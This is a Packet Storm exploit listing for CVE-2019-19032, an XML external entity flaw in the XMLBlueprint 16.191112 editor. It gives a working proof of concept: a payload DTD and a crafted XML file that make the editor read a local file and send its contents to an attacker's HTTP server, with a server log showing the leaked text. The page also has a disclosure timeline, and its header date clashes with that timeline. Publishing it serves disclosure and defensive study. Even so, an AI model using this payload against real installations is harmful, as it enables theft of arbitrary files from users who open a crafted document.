exploit the possibilities

XMLBlueprint 16.191112 XML Injection

XMLBlueprint 16.191112 XML Injection
Posted Jan 29, 2020
Authored by Javier Olmedo

XMLBlueprint version 16.191112 suffers from an XML external entity injection vulnerability.

tags | exploit
advisories | CVE-2019-19032
MD5 | 6fc60d30c5cfdc3911a73e4c53bcd2ff

XMLBlueprint 16.191112 XML Injection

Change Mirror Download
# Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection
# Exploit Author: Javier Olmedo
# Date: 2018-11-14
# Vendor: XMLBlueprint XML Editor
# Software Link: https://www.xmlblueprint.com/update/download-64bit.exe
# Affected Version: 16.191112 and before
# Patched Version: unpatched
# Category: Local
# Platform: XML
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/611.html
# CVE: 2019-19032
# References:
# https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/

# 1. Technical Description
# XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity
# Injection vulnerability through the malicious XML file. This allows a malicious user
# to read arbitrary files.

# 2. Proof Of Concept (PoC)
# 2.1 Start a webserver to receive the connection.

python -m SimpleHTTPServer 80

# 2.2 Upload the payload.dtd file to your web server.

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
%all;

# 2.3 Create a secret.txt file with any content in desktop.

# 2.4 Open poc.xml and click XML -> Validate

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:\Users\jolmedo\Desktop\secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

# 2.5 Your web server will receive a request with the contents of the secret.txt file

Serving HTTP on 0.0.0.0 port 8000 ...
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -

# 3. Timeline
# 13, november 2019 - [RESEARCHER] Discover
# 13, november 2019 - [RESEARCHER] Report to vendor support
# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability
# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
# 22, november 2019 - [RESEARCHER] Public disclosure

# 4. Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close